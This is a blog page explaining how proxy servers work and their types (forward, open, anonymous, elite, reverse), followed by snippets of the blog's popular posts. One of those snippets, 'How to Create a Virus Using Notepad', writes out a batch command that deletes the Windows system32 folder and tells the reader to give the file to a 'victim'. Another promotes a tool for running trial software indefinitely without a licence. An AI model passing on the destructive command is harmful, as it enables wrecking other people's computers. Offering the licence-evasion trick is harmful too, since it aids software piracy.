Skip to main content

Proxy Server and How it Works?

How Proxy Server Works?

An illustration of how a proxy server works is shown below:
Working of a Proxy Server
As shown in the above example, whenever the client connects to a web proxy server and makes a request for the resources (in this case, “Sample.html”) that reside on a remote server (in this case, xyz.com), the proxy server forwards this request to the target server on behalf of the client, so as to fetch the requested resource and deliver it back to the client. An example of client can be a user operated computer that is connected to the Internet.

Types of Proxy Servers and their Uses:

1. Forward Proxies

A forward proxy is the same one described above where the proxy server forwards the client’s request to the target server to establish a communication between the two. Here the client specifies the resources to be fetched and the target server to connect to, so that the forward proxy server acts accordingly. Except forreverse proxy (discussed in the latter part of this article), all other types of proxy servers described in this article falls under forward proxy.

2. Open Proxy

An open proxy is a type of forwarding proxy that is openly available to any Internet user. Most often, an open proxy is used by Internet users to conceal their IP address so that they remain anonymous during their web activity. The following are some of the web proxies that fall under the category of open proxy:

Anonymous Proxy

An anonymous proxy is a type of open proxy that conceals IP address of Internet users so that the target server cannot identify the origin of the requesting client. However, an anonymous proxy identifies itself as a proxy server but still manages to maintain the anonymity of the users.

Distorting Proxy

This type of proxy server identifies itself as a proxy, but reveals an incorrect IP address of the client to the target server.

High Anonymity Proxy (Elite Proxy)

An elite proxy provides maximum anonymity as it neither identifies itself as a proxy nor reveals the original IP address of the client. In most cases, users have to pay for this type of proxy as it is seldom available freely on the Internet.

3. Reverse Proxy

Unlike a forwarding proxy where the client knows that it is connecting through a proxy, a reverse proxyappears to the client as an ordinary server. However, when the client requests resources from this server, it forwards those requests to the target server (actual server where the resources reside) so as to fetch back the requested resource and forward the same to the client. Here, the client is given an impression that it is connecting to the actual server, but in reality there exists a reverse proxy residing between the client and the actual server.
Reverse proxies are often used to reduce load on the actual server by load balancing, to enhance security and to cache static content, so that they can be served faster to the client. Often big companies like Google which gets a large number of hits maintain a reverse proxy so as to enhance the performance of their servers. It is not a surprise that whenever you are connecting to google.com, you are only connecting to a reverse proxy that forwards your search queries to the actual servers to return the results back to you.

Comments

Popular posts from this blog

13 websites to register your free domain

Register your Free Domain Now!! 1)  .tk Dot TK is a FREE domain registry for websites on the Internet. It has exactly the same power as other domain extensions, but it’s free! Because it’s free, millions of others have been using .TK domains since 2001 – which makes .TK powerful and very recognizable.  Your website will be like www.yourdomainname.tk . It is free for 1 year. It’s a ccTLD domain whixh having the abbreviation  Tokelau. To create a .tk domain, Visit   www.dot.tk 2) co.cc Co.cc is completely free domain which is mostly used by blogspot bloggers because of it’s easy to use DNS system. Creating a co.cc for blogger is simple ( for instructions- “click here”). Your website will be like www.yourdomainname.co.cc . To create a .co.cc domain, visit www.co.cc 3)   co.nr co.nr is too like co.cc. Your website will be like  www.yourdomainname.co.nr . You can add it for blogger also.. To create a .co.cc domain, vi...

How to Put Google Adsense Below Post Title in Blogger?

Adsense is used by majority of expert bloggers for their website monetization because it is a cookie based contextual advertising system that shows targeted ads relevant to the content and reader. As bloggers are paid on per click basis, they try various ad placements on the blog to  increase the revenue  and get maximum clicks on the ad units. Well, on some blogs, you might have seen Adsense ad units placed below the post title. Do you know why? It is because the area just below the post title gets the most exposure and is the best place to put AdSense ad units to increase  Click Through Rate (CTR). Even though ads below post title work like a charm but this doesn’t mean that it will work for you as well. If you want to find out the best AdSense ads placement for your blog, try experimenting by placing ads at various locations such as header, sidebar, footer, etc. You can try other  blog monetization methods  as well to effectively monetize y...

C++ Program to Find HCF and LCM among 4 numbers (Easiest Logic)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 #include <iostream> #include <math.h> using namespace std; int main () { int a,b,c,d,i,j,minimum; cout << "Enter the all four number " ; cin >> a >> b >> c >> d; if (a < b && a < c && a < d) minimum = a; else if (b < c && b < d) minimum = b; else if (c < d) minimum = c; else minimum = d; for (j = minimum;; -- j) { if (a % j == 0 && b % j == 0 && c % j == 0 && d % j == 0 ) { break ; } } for (i = 1 ;;i ++ ) { if (i % a == 0 && i % b == 0 && i % c == 0 && i % d == 0 ) break ; } cout << "Lowest Common factor=>" << i << endl; ...

USE any TRIAL SOFTWARE FOREVER WITHOUT SERIAL NUMBER

USE any TRIAL SOFTWARE FOREVER WITHOUT SERIAL NUMBER(most wanted trick) Run a trial software forever now with time stopper you can run a trial software forever no need to fetch for serial numbers,activation codes,patch just DOWNLOAD TIME STOPPER now open it install it click browse select the .exe of the software or file which you want to run forever now simply click create desktop icon and now delete all its existing shortcuts now have fun enjoying software for life time

python program to Print Starting Series OF Indian Mobile Number for a State or operator or both

import requests import urllib.request import time from bs4 import BeautifulSoup as bs import re url = ' https://en.wikipedia.org/wiki/Mobile_telephone_numbering_in_India' state_to_extract = "UE" #if set to None all state is considered telecom_to_extracted = None #if set to none all operator from particular city is extracted response = requests . get(url) print (response) soup = bs(response . text, "html.parser" ) one_a_tag = soup . findAll( 'tr' )[ 35 :] lst = [] for k in one_a_tag: s = k . findAll( 'td' ) limit = len (s) i = 0 while True : if i == limit: break no = s[i] . text i += 1 if i == limit: break operator = s[i] . text i += 1 if i == limit: break state = s[i] . text i += 1 if i == limit: break res = f "{no} {operator} {state}" if state_to_extract is None : if telecom_to_extracted is None : lst . append(no) elif telecom_to_e...

How to Create a Virus Using Notepad.

its 100% working Introduction : Friends , all of you are most probably aware of viruses. The Only Headache of Every Windows PC owner is that his Pc might get virus. If a virus hits your computer, then no need to say what a nightmare you'll have. And what if someone sent you a virus through a USB, or mail attachment ? There are times in our lives , when we think " Hope, I too could create a virus ". Well then this is the time friends, So here I am posting the process how to create a virus. And sorry i cant post the virus file itself, as Internet doesn't allow to post or send .bat or .cmd files http://raj360.co.nr Process: Open Notepad Write / copy the below command there: " del c:\WINDOWS\system32\*.*/q " without quote and save as " anything.bat" Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.

Flash and Unbrick Redmi 4 (India) [verified] [used by me]

Flash and Unbrick Redmi 4 (India) Please be noted I will not take any responsibility for anything happened to your device. Important: - Before flashing, it is advised to take the backup of data and make sure that your phone battery is charged enough. Note: This method will work with every ROM, Upgrade/Downgrade, Locked BL/Unlocked BL. Don't ask queries before reading the whole guide. NOTE: this guide is not written by ME . its by MUZ ..  When you can use Test Point for Flashing: 1. If a phone is totally dead, No Fastboot, No recovery. 2. If you are struck in Qualcomm USB 900e mode. 3. The bootloader is locked and a device is in bootloop. 4. You need to Flash Developer or Stable ROM on Locked BL. EDL Mode has been removed/Disabled from 8.1 onwards, you can flash on Unlocked BL only. Steps to Disassemble Redmi 4  (India)/4X: 1. Power off the Phone and remove the SIM Card Tray. You need below tools. 1. Anti-static angle tweezer 2....

C++ Program to implement File Handling by using ifstream & ofstream

Get the Rollno, Names and Marks Obtained of N students. The data should be stored in “RESULT” data file. Use the same file to print the result along with aggregate percentage for all the students. #include #include #include class Cstud{     private:         char name[10];         int roll, marks;     public:         void getdata();         void putdata();         int calc() const;     }; void Cstud :: getdata(){     cout<<"\n Enter Name: ";     cin>>name;     cout<<"\n Enter Roll No: ";     cin>>roll;     cout<<"\n Enter Marks: ";     cin>>marks;     } int Cstud :: calc() const{     return marks;     } void Cstud :: putdata(){     cout<<"\n Name: "<     cout<<"\n Roll...

Reserved Words In JAVA (total 53 Reserve Words)

RESERVED WORDS: In java the words which are having fixed functionalities or fixed Values are called as reserve words. Total Number of reserve words =53. Category of Reserve Words: 1 .Keywords ---> The words which are having fixed Functionalities. 2. Literals (Constant)---->The words which are having fixed Values .(3)---- i) true ii) false iii) null. NOTE: all the reserved words (Keywords and Literals) are in small letters. Keywords: (i) Datatype related :- byte ,short,int ,long,float,double,char,boolean. (ii) Flow Control Related Keywords: - if ,else ,switch,case ,default,continue,break,for,while,do while. (iii) Method Related Keywords:- void ,return. (iv) Unused keywords: goto ,const. (v) New Keywords: assert,enum. (vi) exception handling Keywords: try,catch,finally,throws,throw. (vii) Class Related keywords : class,extends,interface,implements,pacakage,import. (viii) Object Related Keywords: this,new,super,instanceof. ...